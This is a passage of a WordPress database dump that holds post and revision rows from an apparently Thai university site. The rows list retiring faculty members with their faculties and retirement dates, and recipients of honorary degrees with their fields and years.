(450, 1, '2019-05-27 07:53:44', '2019-05-27 00:53:44', 'ผู้ช่วยศาสตราจารย์ ดร. นิรัชรินทร์  ชำนาญกิจ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์ ดร. นิรัชรินทร์  ชำนาญกิจ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b8%99', '', '', '2019-05-27 07:53:44', '2019-05-27 00:53:44', '', 0, 'http://172.17.40.11/wp511/?p=450', 0, 'post', '', 0),
(451, 1, '2019-05-27 07:53:44', '2019-05-27 00:53:44', 'ผู้ช่วยศาสตราจารย์ ดร. นิรัชรินทร์  ชำนาญกิจ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2555', 'ผู้ช่วยศาสตราจารย์ ดร. นิรัชรินทร์  ชำนาญกิจ', '', 'inherit', 'closed', 'closed', '', '450-revision-v1', '', '', '2019-05-27 07:53:44', '2019-05-27 00:53:44', '', 450, 'http://172.17.40.11/wp511/?p=451', 0, 'revision', '', 0),
(452, 1, '2019-05-27 07:53:58', '2019-05-27 00:53:58', 'รองศาสตราจารย์กิตติ  ตันไทย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน 2556', 'รองศาสตราจารย์กิตติ  ตันไทย', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%81%e0%b8%b4%e0%b8%95%e0%b8%95%e0%b8%b4-%e0%b8%95%e0%b8%b1', '', '', '2019-05-27 07:58:56', '2019-05-27 00:58:56', '', 0, 'http://172.17.40.11/wp511/?p=452', 0, 'post', '', 0),
(453, 1, '2019-05-27 07:53:58', '2019-05-27 00:53:58', 'รองศาสตราจารย์กิตติ  ตันไทย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์', 'รองศาสตราจารย์กิตติ  ตันไทย', '', 'inherit', 'closed', 'closed', '', '452-revision-v1', '', '', '2019-05-27 07:53:58', '2019-05-27 00:53:58', '', 452, 'http://172.17.40.11/wp511/?p=453', 0, 'revision', '', 0),
(454, 1, '2019-05-27 07:54:11', '2019-05-27 00:54:11', 'รองศาสตราจารย์ชาญชัย  เรืองขจร\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'รองศาสตราจารย์ชาญชัย  เรืองขจร', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%8a%e0%b8%b2%e0%b8%8d%e0%b8%8a%e0%b8%b1%e0%b8%a2-%e0%b9%80', '', '', '2019-05-27 07:58:41', '2019-05-27 00:58:41', '', 0, 'http://172.17.40.11/wp511/?p=454', 0, 'post', '', 0),
(455, 1, '2019-05-27 07:54:11', '2019-05-27 00:54:11', 'รองศาสตราจารย์ชาญชัย  เรืองขจร\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี', 'รองศาสตราจารย์ชาญชัย  เรืองขจร', '', 'inherit', 'closed', 'closed', '', '454-revision-v1', '', '', '2019-05-27 07:54:11', '2019-05-27 00:54:11', '', 454, 'http://172.17.40.11/wp511/?p=455', 0, 'revision', '', 0),
(456, 1, '2019-05-27 07:54:23', '2019-05-27 00:54:23', 'รองศาสตราจารย์ทิพย์วัลย์  เรืองขจร\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'รองศาสตราจารย์ทิพย์วัลย์  เรืองขจร', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%b4%e0%b8%9e%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b1%e0%b8%a5', '', '', '2019-05-27 07:58:26', '2019-05-27 00:58:26', '', 0, 'http://172.17.40.11/wp511/?p=456', 0, 'post', '', 0),
(457, 1, '2019-05-27 07:54:23', '2019-05-27 00:54:23', 'รองศาสตราจารย์ทิพย์วัลย์  เรืองขจร\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี', 'รองศาสตราจารย์ทิพย์วัลย์  เรืองขจร', '', 'inherit', 'closed', 'closed', '', '456-revision-v1', '', '', '2019-05-27 07:54:23', '2019-05-27 00:54:23', '', 456, 'http://172.17.40.11/wp511/?p=457', 0, 'revision', '', 0),
(458, 1, '2019-05-27 07:54:37', '2019-05-27 00:54:37', 'ผู้ช่วยศาสตราจารย์ ดร.โชคดี  ชเลิศเพ็ชร์\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'ผู้ช่วยศาสตราจารย์ ดร.โชคดี  ชเลิศเพ็ชร์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%94%e0%b8%a3-%e0%b9%82%e0%b8%8a', '', '', '2019-05-27 07:58:11', '2019-05-27 00:58:11', '', 0, 'http://172.17.40.11/wp511/?p=458', 0, 'post', '', 0),
(459, 1, '2019-05-27 07:54:37', '2019-05-27 00:54:37', 'ผู้ช่วยศาสตราจารย์ ดร.โชคดี  ชเลิศเพ็ชร์\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร', 'ผู้ช่วยศาสตราจารย์ ดร.โชคดี  ชเลิศเพ็ชร์', '', 'inherit', 'closed', 'closed', '', '458-revision-v1', '', '', '2019-05-27 07:54:37', '2019-05-27 00:54:37', '', 458, 'http://172.17.40.11/wp511/?p=459', 0, 'revision', '', 0),
(460, 1, '2019-05-27 07:54:49', '2019-05-27 00:54:49', 'อาจารย์ทวี  บำรุงศักดิ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'อาจารย์ทวี  บำรุงศักดิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%a7%e0%b8%b5-%e0%b8%9a%e0%b8%b3%e0%b8%a3%e0%b8%b8%e0%b8%87%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c', '', '', '2019-05-27 07:57:58', '2019-05-27 00:57:58', '', 0, 'http://172.17.40.11/wp511/?p=460', 0, 'post', '', 0),
(461, 1, '2019-05-27 07:54:49', '2019-05-27 00:54:49', 'อาจารย์ทวี  บำรุงศักดิ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์', 'อาจารย์ทวี  บำรุงศักดิ์', '', 'inherit', 'closed', 'closed', '', '460-revision-v1', '', '', '2019-05-27 07:54:49', '2019-05-27 00:54:49', '', 460, 'http://172.17.40.11/wp511/?p=461', 0, 'revision', '', 0),
(462, 1, '2019-05-27 07:55:01', '2019-05-27 00:55:01', 'รองศาสตราจารย์วรรณี  ธรรมโชติ\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2556', 'รองศาสตราจารย์วรรณี  ธรรมโชติ', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%b5-%e0%b8%98%e0%b8%a3', '', '', '2019-05-27 07:57:41', '2019-05-27 00:57:41', '', 0, 'http://172.17.40.11/wp511/?p=462', 0, 'post', '', 0),
(463, 1, '2019-05-27 07:55:01', '2019-05-27 00:55:01', 'รองศาสตราจารย์วรรณี  ธรรมโชติ\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี', 'รองศาสตราจารย์วรรณี  ธรรมโชติ', '', 'inherit', 'closed', 'closed', '', '462-revision-v1', '', '', '2019-05-27 07:55:01', '2019-05-27 00:55:01', '', 462, 'http://172.17.40.11/wp511/?p=463', 0, 'revision', '', 0),
(464, 1, '2019-05-27 07:55:13', '2019-05-27 00:55:13', 'รองศาสตราจารย์วรสิทธิ์  มุทธเมธา\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2556', 'รองศาสตราจารย์วรสิทธิ์  มุทธเมธา', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%a3%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c', '', '', '2019-05-27 07:57:29', '2019-05-27 00:57:29', '', 0, 'http://172.17.40.11/wp511/?p=464', 0, 'post', '', 0),
(465, 1, '2019-05-27 07:55:13', '2019-05-27 00:55:13', 'รองศาสตราจารย์วรสิทธิ์  มุทธเมธา\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์', 'รองศาสตราจารย์วรสิทธิ์  มุทธเมธา', '', 'inherit', 'closed', 'closed', '', '464-revision-v1', '', '', '2019-05-27 07:55:13', '2019-05-27 00:55:13', '', 464, 'http://172.17.40.11/wp511/?p=465', 0, 'revision', '', 0),
(466, 1, '2019-05-27 07:55:26', '2019-05-27 00:55:26', 'ผู้ช่วยศาสตราจารย์สนธยา  พลศรี\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2556', 'ผู้ช่วยศาสตราจารย์สนธยา  พลศรี', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%99%e0%b8%98%e0%b8%a2', '', '', '2019-05-27 07:57:13', '2019-05-27 00:57:13', '', 0, 'http://172.17.40.11/wp511/?p=466', 0, 'post', '', 0),
(467, 1, '2019-05-27 07:55:26', '2019-05-27 00:55:26', 'ผู้ช่วยศาสตราจารย์สนธยา  พลศรี\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์', 'ผู้ช่วยศาสตราจารย์สนธยา  พลศรี', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2019-05-27 07:55:26', '2019-05-27 00:55:26', '', 466, 'http://172.17.40.11/wp511/?p=467', 0, 'revision', '', 0),
(468, 1, '2019-05-27 07:55:41', '2019-05-27 00:55:41', 'อาจารย์สมศักดิ์  ภควัตชัย\r\n\r\nสังกัด  คณะเทคโนโลยีอุตสาหกรรม\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2556', 'อาจารย์สมศักดิ์  ภควัตชัย', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%a1%e0%b8%a8%e0%b8%b1%e0%b8%81%e0%b8%94%e0%b8%b4%e0%b9%8c-%e0%b8%a0%e0%b8%84%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%8a', '', '', '2019-05-27 07:56:58', '2019-05-27 00:56:58', '', 0, 'http://172.17.40.11/wp511/?p=468', 0, 'post', '', 0),
(469, 1, '2019-05-27 07:55:41', '2019-05-27 00:55:41', 'อาจารย์สมศักดิ์  ภควัตชัย\r\n\r\nสังกัด  คณะเทคโนโลยีอุตสาหกรรม', 'อาจารย์สมศักดิ์  ภควัตชัย', '', 'inherit', 'closed', 'closed', '', '468-revision-v1', '', '', '2019-05-27 07:55:41', '2019-05-27 00:55:41', '', 468, 'http://172.17.40.11/wp511/?p=469', 0, 'revision', '', 0),
(470, 1, '2019-05-27 07:55:54', '2019-05-27 00:55:54', 'อาจารย์เสรี  เรืองดิษฐ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียนอายุราชการ  วันที่ 30 กันยายน 2556', 'อาจารย์เสรี  เรืองดิษฐ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b5-%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%87%e0%b8%94%e0%b8%b4%e0%b8%a9%e0%b8%90%e0%b9%8c', '', '', '2019-05-27 07:56:38', '2019-05-27 00:56:38', '', 0, 'http://172.17.40.11/wp511/?p=470', 0, 'post', '', 0),
(471, 1, '2019-05-27 07:55:54', '2019-05-27 00:55:54', 'อาจารย์เสรี  เรืองดิษฐ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี', 'อาจารย์เสรี  เรืองดิษฐ์', '', 'inherit', 'closed', 'closed', '', '470-revision-v1', '', '', '2019-05-27 07:55:54', '2019-05-27 00:55:54', '', 470, 'http://172.17.40.11/wp511/?p=471', 0, 'revision', '', 0),
(472, 1, '2019-05-27 07:56:38', '2019-05-27 00:56:38', 'อาจารย์เสรี  เรืองดิษฐ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียนอายุราชการ  วันที่ 30 กันยายน 2556', 'อาจารย์เสรี  เรืองดิษฐ์', '', 'inherit', 'closed', 'closed', '', '470-revision-v1', '', '', '2019-05-27 07:56:38', '2019-05-27 00:56:38', '', 470, 'http://172.17.40.11/wp511/?p=472', 0, 'revision', '', 0),
(473, 1, '2019-05-27 07:56:58', '2019-05-27 00:56:58', 'อาจารย์สมศักดิ์  ภควัตชัย\r\n\r\nสังกัด  คณะเทคโนโลยีอุตสาหกรรม\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2556', 'อาจารย์สมศักดิ์  ภควัตชัย', '', 'inherit', 'closed', 'closed', '', '468-revision-v1', '', '', '2019-05-27 07:56:58', '2019-05-27 00:56:58', '', 468, 'http://172.17.40.11/wp511/?p=473', 0, 'revision', '', 0),
(474, 1, '2019-05-27 07:57:13', '2019-05-27 00:57:13', 'ผู้ช่วยศาสตราจารย์สนธยา  พลศรี\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2556', 'ผู้ช่วยศาสตราจารย์สนธยา  พลศรี', '', 'inherit', 'closed', 'closed', '', '466-revision-v1', '', '', '2019-05-27 07:57:13', '2019-05-27 00:57:13', '', 466, 'http://172.17.40.11/wp511/?p=474', 0, 'revision', '', 0),
(475, 1, '2019-05-27 07:57:29', '2019-05-27 00:57:29', 'รองศาสตราจารย์วรสิทธิ์  มุทธเมธา\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2556', 'รองศาสตราจารย์วรสิทธิ์  มุทธเมธา', '', 'inherit', 'closed', 'closed', '', '464-revision-v1', '', '', '2019-05-27 07:57:29', '2019-05-27 00:57:29', '', 464, 'http://172.17.40.11/wp511/?p=475', 0, 'revision', '', 0),
(476, 1, '2019-05-27 07:57:41', '2019-05-27 00:57:41', 'รองศาสตราจารย์วรรณี  ธรรมโชติ\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่  30 กันยายน 2556', 'รองศาสตราจารย์วรรณี  ธรรมโชติ', '', 'inherit', 'closed', 'closed', '', '462-revision-v1', '', '', '2019-05-27 07:57:41', '2019-05-27 00:57:41', '', 462, 'http://172.17.40.11/wp511/?p=476', 0, 'revision', '', 0),
(477, 1, '2019-05-27 07:57:58', '2019-05-27 00:57:58', 'อาจารย์ทวี  บำรุงศักดิ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'อาจารย์ทวี  บำรุงศักดิ์', '', 'inherit', 'closed', 'closed', '', '460-revision-v1', '', '', '2019-05-27 07:57:58', '2019-05-27 00:57:58', '', 460, 'http://172.17.40.11/wp511/?p=477', 0, 'revision', '', 0),
(478, 1, '2019-05-27 07:58:11', '2019-05-27 00:58:11', 'ผู้ช่วยศาสตราจารย์ ดร.โชคดี  ชเลิศเพ็ชร์\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'ผู้ช่วยศาสตราจารย์ ดร.โชคดี  ชเลิศเพ็ชร์', '', 'inherit', 'closed', 'closed', '', '458-revision-v1', '', '', '2019-05-27 07:58:11', '2019-05-27 00:58:11', '', 458, 'http://172.17.40.11/wp511/?p=478', 0, 'revision', '', 0),
(479, 1, '2019-05-27 07:58:26', '2019-05-27 00:58:26', 'รองศาสตราจารย์ทิพย์วัลย์  เรืองขจร\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'รองศาสตราจารย์ทิพย์วัลย์  เรืองขจร', '', 'inherit', 'closed', 'closed', '', '456-revision-v1', '', '', '2019-05-27 07:58:26', '2019-05-27 00:58:26', '', 456, 'http://172.17.40.11/wp511/?p=479', 0, 'revision', '', 0),
(480, 1, '2019-05-27 07:58:41', '2019-05-27 00:58:41', 'รองศาสตราจารย์ชาญชัย  เรืองขจร\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2556', 'รองศาสตราจารย์ชาญชัย  เรืองขจร', '', 'inherit', 'closed', 'closed', '', '454-revision-v1', '', '', '2019-05-27 07:58:41', '2019-05-27 00:58:41', '', 454, 'http://172.17.40.11/wp511/?p=480', 0, 'revision', '', 0),
(481, 1, '2019-05-27 07:58:56', '2019-05-27 00:58:56', 'รองศาสตราจารย์กิตติ  ตันไทย\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน 2556', 'รองศาสตราจารย์กิตติ  ตันไทย', '', 'inherit', 'closed', 'closed', '', '452-revision-v1', '', '', '2019-05-27 07:58:56', '2019-05-27 00:58:56', '', 452, 'http://172.17.40.11/wp511/?p=481', 0, 'revision', '', 0),
(482, 1, '2019-05-27 08:01:07', '2019-05-27 01:01:07', 'นายเอนก  นาวิกมูล\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  วัฒนธรรม', 'นายเอนก  นาวิกมูล (2552)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%80%e0%b8%ad%e0%b8%99%e0%b8%81-%e0%b8%99%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%81%e0%b8%a1%e0%b8%b9%e0%b8%a5-2552', '', '', '2019-05-27 08:01:07', '2019-05-27 01:01:07', '', 0, 'http://172.17.40.11/wp511/?p=482', 0, 'post', '', 0),
(483, 1, '2019-05-27 08:01:07', '2019-05-27 01:01:07', 'นายเอนก  นาวิกมูล\r\n\r\nปริญญาศิลปศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  วัฒนธรรม', 'นายเอนก  นาวิกมูล (2552)', '', 'inherit', 'closed', 'closed', '', '482-revision-v1', '', '', '2019-05-27 08:01:07', '2019-05-27 01:01:07', '', 482, 'http://172.17.40.11/wp511/?p=483', 0, 'revision', '', 0),
(484, 1, '2019-05-27 08:01:39', '2019-05-27 01:01:39', 'พระครูวิภัชธรรมคุณ (สุทิน ฉนทธมโม)\r\n\r\nปริญญาครุศาสตรมหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  หลักสูตรและการสอน', 'พระครูวิภัชธรรมคุณ (สุทิน ฉนทธมโม) (2552)', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%a7%e0%b8%b4%e0%b8%a0%e0%b8%b1%e0%b8%8a%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93-%e0%b8%aa%e0%b8%b8%e0%b8%97%e0%b8%b4', '', '', '2019-05-27 08:01:39', '2019-05-27 01:01:39', '', 0, 'http://172.17.40.11/wp511/?p=484', 0, 'post', '', 0),
(485, 1, '2019-05-27 08:01:39', '2019-05-27 01:01:39', 'พระครูวิภัชธรรมคุณ (สุทิน ฉนทธมโม)\r\n\r\nปริญญาครุศาสตรมหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  หลักสูตรและการสอน', 'พระครูวิภัชธรรมคุณ (สุทิน ฉนทธมโม) (2552)', '', 'inherit', 'closed', 'closed', '', '484-revision-v1', '', '', '2019-05-27 08:01:39', '2019-05-27 01:01:39', '', 484, 'http://172.17.40.11/wp511/?p=485', 0, 'revision', '', 0),
(486, 1, '2019-05-27 08:01:52', '2019-05-27 01:01:52', 'นายอรุณ  แก้วสัตยา\r\n\r\nปริญญา  ศิลปศาสตร์มหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  ออกแบบประยุกต์ศิลป์', 'นายอรุณ  แก้วสัตยา (2552)', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b8%ad%e0%b8%a3%e0%b8%b8%e0%b8%93-%e0%b9%81%e0%b8%81%e0%b9%89%e0%b8%a7%e0%b8%aa%e0%b8%b1%e0%b8%95%e0%b8%a2%e0%b8%b2-2552', '', '', '2019-05-27 08:01:52', '2019-05-27 01:01:52', '', 0, 'http://172.17.40.11/wp511/?p=486', 0, 'post', '', 0),
(487, 1, '2019-05-27 08:01:52', '2019-05-27 01:01:52', 'นายอรุณ  แก้วสัตยา\r\n\r\nปริญญา  ศิลปศาสตร์มหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  ออกแบบประยุกต์ศิลป์', 'นายอรุณ  แก้วสัตยา (2552)', '', 'inherit', 'closed', 'closed', '', '486-revision-v1', '', '', '2019-05-27 08:01:52', '2019-05-27 01:01:52', '', 486, 'http://172.17.40.11/wp511/?p=487', 0, 'revision', '', 0),
(488, 1, '2019-05-27 08:02:04', '2019-05-27 01:02:04', 'รองศาสตราจารย์บุญรักษา  สุนทรธรรม\r\n\r\nปริญญาวิทยาศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  ฟิสิกส์ดาราศาสตร์', 'รองศาสตราจารย์บุญรักษา  สุนทรธรรม (2553)', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b8%a3%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2019-05-27 08:02:04', '2019-05-27 01:02:04', '', 0, 'http://172.17.40.11/wp511/?p=488', 0, 'post', '', 0),
(489, 1, '2019-05-27 08:02:04', '2019-05-27 01:02:04', 'รองศาสตราจารย์บุญรักษา  สุนทรธรรม\r\n\r\nปริญญาวิทยาศาสตร์ดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  ฟิสิกส์ดาราศาสตร์', 'รองศาสตราจารย์บุญรักษา  สุนทรธรรม (2553)', '', 'inherit', 'closed', 'closed', '', '488-revision-v1', '', '', '2019-05-27 08:02:04', '2019-05-27 01:02:04', '', 488, 'http://172.17.40.11/wp511/?p=489', 0, 'revision', '', 0),
(490, 1, '2019-05-27 08:02:17', '2019-05-27 01:02:17', 'พระครูโสภณคุณาทร (สมปอง อชิโต)\r\n\r\nปริญญาศิลปศษสตร์มหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขา  การพัฒนาชุมชน', 'พระครูโสภณคุณาทร (สมปอง อชิโต) (2553)', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b9%82%e0%b8%aa%e0%b8%a0%e0%b8%93%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%b2%e0%b8%97%e0%b8%a3-%e0%b8%aa%e0%b8%a1%e0%b8%9b%e0%b8%ad%e0%b8%87', '', '', '2019-05-27 08:02:17', '2019-05-27 01:02:17', '', 0, 'http://172.17.40.11/wp511/?p=490', 0, 'post', '', 0),
(491, 1, '2019-05-27 08:02:17', '2019-05-27 01:02:17', 'พระครูโสภณคุณาทร (สมปอง อชิโต)\r\n\r\nปริญญาศิลปศษสตร์มหาบัณฑิตกิตติมศักดิ์\r\n\r\nสาขา  การพัฒนาชุมชน', 'พระครูโสภณคุณาทร (สมปอง อชิโต) (2553)', '', 'inherit', 'closed', 'closed', '', '490-revision-v1', '', '', '2019-05-27 08:02:17', '2019-05-27 01:02:17', '', 490, 'http://172.17.40.11/wp511/?p=491', 0, 'revision', '', 0),
(492, 1, '2019-05-27 08:02:31', '2019-05-27 01:02:31', 'ดร.อรัญ  ธรรมโน\r\n\r\nปริญญาบริหารธุรกิจดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  บริหารทรัพยากรมนุษย์', 'ดร.อรัญ  ธรรมโน (2554)', '', 'publish', 'closed', 'open', '', '%e0%b8%94%e0%b8%a3-%e0%b8%ad%e0%b8%a3%e0%b8%b1%e0%b8%8d-%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%99-2554', '', '', '2019-05-27 08:02:31', '2019-05-27 01:02:31', '', 0, 'http://172.17.40.11/wp511/?p=492', 0, 'post', '', 0),
(493, 1, '2019-05-27 08:02:31', '2019-05-27 01:02:31', 'ดร.อรัญ  ธรรมโน\r\n\r\nปริญญาบริหารธุรกิจดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  บริหารทรัพยากรมนุษย์', 'ดร.อรัญ  ธรรมโน (2554)', '', 'inherit', 'closed', 'closed', '', '492-revision-v1', '', '', '2019-05-27 08:02:31', '2019-05-27 01:02:31', '', 492, 'http://172.17.40.11/wp511/?p=493', 0, 'revision', '', 0),
(494, 1, '2019-05-27 08:02:42', '2019-05-27 01:02:42', 'พระพรหมจริยาจารย์ (สงัด  ปัญญาวุโธ)\r\n\r\nปริญญาครุศาสตรดุษฎีบัณฑิตกิตติมศักดิ์\r\n\r\nสาขาวิชา  การบริหารการศึกษา\r\n\r\nประจำปีการศึกษา  2552 - 2553', 'พระพรหมจริยาจารย์ (สงัด  ปัญญาวุโธ)', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a3%e0%b8%ab%e0%b8%a1%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c-%e0%b8%aa%e0%b8%87%e0%b8%b1%e0%b8%94', '', '', '2019-05-27 08:02:42', '2019-05-27 01:02:42', '', 0, 'http://172.17.40.11/wp511/?p=494', 0, 'post', '', 0),
